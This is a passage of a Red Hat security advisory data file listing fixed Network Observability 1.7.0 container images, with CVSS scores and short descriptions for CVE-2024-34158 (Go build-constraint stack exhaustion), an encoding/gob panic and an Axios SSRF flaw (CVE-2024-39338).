"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-34158", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2024-09-06T21:20:12.126400+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310529", }, ], notes: [ { category: "description", text: "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34158", }, { category: "external", summary: "RHBZ#2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34158", url: "https://www.cve.org/CVERecord?id=CVE-2024-34158", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", }, { category: "external", summary: "https://go.dev/cl/611240", url: "https://go.dev/cl/611240", }, { category: "external", summary: "https://go.dev/issue/69141", url: "https://go.dev/issue/69141", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3107", url: "https://pkg.go.dev/vuln/GO-2024-3107", }, ], release_date: "2024-09-06T21:15:12.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-39338", cwe: { id: "CWE-918", name: "Server-Side Request Forgery (SSRF)", }, discovery_date: "2024-08-13T17:21:32.774718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2304369", }, ], notes: [ { category: "description", text: "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.", title: "Vulnerability description", }, { category: "summary", text: "axios: axios: Server-Side Request Forgery", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", 